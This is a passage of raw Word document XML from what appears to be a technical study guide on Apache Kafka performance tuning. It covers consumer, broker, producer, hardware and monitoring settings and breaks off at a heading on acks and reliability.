    <w:p w14:paraId="6974839C" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E"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nsumers read data from Kafka, and their configuration can significantly impact message processing speed and lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E9E3CB"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a. Increase Parallelism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D4C0B4" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160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Multiple Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you have multiple partitions, increase the number of consumers in the consumer group to handle parallel consumption. Each consumer can handle a separate partition, and more consumers increase throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F1B10D"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b. Optimize max.poll.records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07221CA3" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160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max.poll.records</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The max.poll.records setting controls how many records a consumer fetches in each poll. If the consumer processes messages quickly, increase this value to improve throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B155AF"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c. Tune fetch.min.bytes and fetch.max.bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2830E475" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160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fetch.min.bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fetch.max.bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These settings determine how much data Kafka will send in a single request. Increasing fetch.max.bytes allows the consumer to fetch more data in a single poll, reducing network round trips.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B913B9"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d. Configure max.poll.interval.ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35369B64" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161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max.poll.interval.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure this value is large enough to accommodate the time needed for your consumer to process the messages. If the consumer takes too long to process a message, Kafka may consider it as stalled and trigger a rebalance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF4167C"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4. Optimize Kafka Hardware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510F4DA4" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E"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Kafka's hardware plays an important role in ensuring high throughput and low latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53226811"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a. Use Fast Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FF25B2" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161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SD Drives</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka relies heavily on disk I/O for message storage. Ensure that the Kafka brokers use fast storage such as SSDs to reduce latency and improve throughput, especially when dealing with high-volume workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C560F7A"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b. Increase RAM and CPU Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9CB828" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161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Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allocate enough RAM to Kafka brokers, particularly for operating system cache, Kafka’s page cache, and network buffers. Insufficient RAM can lead to frequent garbage collection (GC) pauses and poor performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73517B51" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161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PU</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers benefit from multiple CPU cores, especially in high-throughput environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F4D9C0"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c. Network Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27525007" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161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Network Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that Kafka brokers and producers/consumers have sufficient network throughput, especially in high-throughput scenarios. Network bottlenecks can significantly reduce Kafka performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD4D5A4"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5. Kafka Cluster Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F14B7CA" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E"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Optimizing the Kafka cluster is essential for ensuring reliability and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DB9799"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a. Add More Brokers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B53B2E8" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161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luster Size</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To handle a larger load, scale horizontally by adding more Kafka brokers. This increases the number of partitions and distributes the load, improving performance and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65033E74"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b. Increase ZooKeeper Capacity (if using)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487FCF9E" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161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ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that ZooKeeper (if used) is configured and scaled properly. A single ZooKeeper node can become a bottleneck, so consider setting up a quorum of ZooKeeper nodes for reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4CB451"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6. Implement Monitoring and Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAE720D" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E"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ntinuous monitoring is key to identifying and resolving performance issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A2269"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lastRenderedPageBreak/>
        <w:t>a. Use JMX Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E6C6C6" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161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Kafka exposes numerous JMX metrics (e.g., throughput, consumer lag, disk usage, etc.) that can be used to monitor Kafka’s health and performance. Use tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to monitor these metrics in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A646F59"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b. Log Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1085DE" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161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nsure that Kafka logs are actively monitored to spot errors, warnings, and performance issues. Set up centralized logging systems (e.g., ELK stack, Splunk) to track errors, and keep an eye on key performance indicators (KPIs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EC7C00"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7. Use Kafka Tiered Storage (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795DEA7B" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E"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For large datasets and to reduce storage costs, consider using </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tiered storage</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (available in newer versions of Kafka) to offload older data to cloud storage systems while keeping active data on local disks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F972C3" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B462E7" w14:textId="77777777" w:rsidR="00290B0E" w:rsidRPr="004269A3" w:rsidRDefault="00290B0E"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Optimizing Kafka performance involves balancing several factors, such as broker configuration, partitioning strategy, producer and consumer tuning, hardware upgrades, and network optimizations. By systematically adjusting configurations and scaling the Kafka cluster, you can ensure high throughput, low latency, and fault tolerance in a production environment. Continuous monitoring and performance testing are also critical to ensuring that Kafka meets your performance and reliability goals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D1ED3E" w14:textId="45A0ABE3"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B55132B">
          <v:rect id="_x0000_i3245" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50872C5A" w14:textId="7B843FDE" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00543E3B" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="813" w:name="_Toc196308293"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Discuss strategies to optimize Kafka, including tuning broker configurations, optimizing producer and consumer settings, and ensuring adequate hardware resources</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="813"/>
    </w:p>
    <w:p w14:paraId="2F8EC5DE" w14:textId="15B4A00E" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Optimizing Kafka involves a comprehensive approach that addresses several aspects of Kafka's configuration and hardware resources. Below are strategies for optimizing Kafka, including tuning broker configurations, optimizing producer and consumer settings, and ensuring adequate hardware resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1349B436"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1. Tuning Broker Configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9337F0"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Kafka brokers are the heart of the Kafka cluster, and their configuration plays a key role in its performance and reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D5AE21"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a. Optimize Partitioning Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17860DD2" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161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Number of Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: More partitions enable parallelism, allowing Kafka to handle high throughput. However, more partitions come with the cost of increased resource usage (e.g., memory, disk I/O). Ensure that the number of partitions is balanced based on expected throughput and consumer parallelism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCCDF00" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161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Partition Assignment</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Evenly distribute partitions across brokers to avoid unbalanced loads. Use tools like Kafka's rebalance to ensure an even partition distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A93AED6"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b. Replication Factor and In-Sync Replicas (ISR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA7052E" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161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Replication Factor</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Set the replication factor to ensure fault tolerance. Typically, a replication factor of 3 is recommended to ensure that Kafka can survive the loss of one or two brokers. However, more replicas increase the I/O overhead, so it's essential to balance fault tolerance and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687EB3D0" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161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Min ISR</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Configure min.insync.replicas to ensure that producers wait for a certain number of in-sync replicas before acknowledging writes, ensuring data durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC52760"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c. Log Segmentation and Retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29846E89" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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Log Segment Size (log.segment.bytes)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Larger log segments reduce the number of file operations required but can increase latency for log compaction. Adjust the log segment size according to your throughput and latency needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58913D62" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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Retention Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Define appropriate retention policies based on time or size. Kafka supports log.retention.ms (time-based) and log.retention.bytes (size-based). Log compaction (log.cleanup.policy=compact) is useful for key-based retention, especially for stateful processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ECBA9B"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d. Network and Disk Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BFBCA0" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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Network Threads (num.network.threads)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers use network threads to handle requests. Increase the number of network threads if your Kafka brokers are handling high network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B42AAE" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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I/O Threads (num.io.threads)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka's I/O threads are responsible for disk reads and writes. Increase these threads to improve disk throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD625E9" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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Disk I/O Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use high-performance disks like SSDs for Kafka’s storage. Kafka is heavily reliant on disk I/O, so fast storage is critical for ensuring low latency and high throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4479272C"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e. Buffering and Memory Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E0A06B" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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lastRenderedPageBreak/>
        <w:t>Heap Size</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers use JVM, so adjusting the heap size is important for ensuring sufficient memory for caching and garbage collection. Set the heap size based on the number of partitions and message volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2277161E" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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Page Cache</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka uses the OS page cache for data storage, so ensure that brokers have sufficient memory to cache frequently accessed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D985071"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2. Optimizing Producer Configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6752ED31"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he producer sends messages to Kafka topics, and its configuration plays a crucial role in throughput and latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73627173"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a. Batching and Compression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A74443" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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Batch Size (batch.size)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The batch.size setting controls how many bytes the producer will batch before sending them to the broker. Larger batch sizes can improve throughput but increase latency. Adjust this setting based on your throughput requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F27F02" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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ompression (compression.type)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka supports different compression algorithms such as snappy, gzip, and lz4. Compression reduces the size of messages, improving network and disk I/O. snappy is a good choice for most use cases as it provides a good balance between compression and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FF19D6"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b. Acks and Reliability</w:t>
      </w:r>
    </w:p>
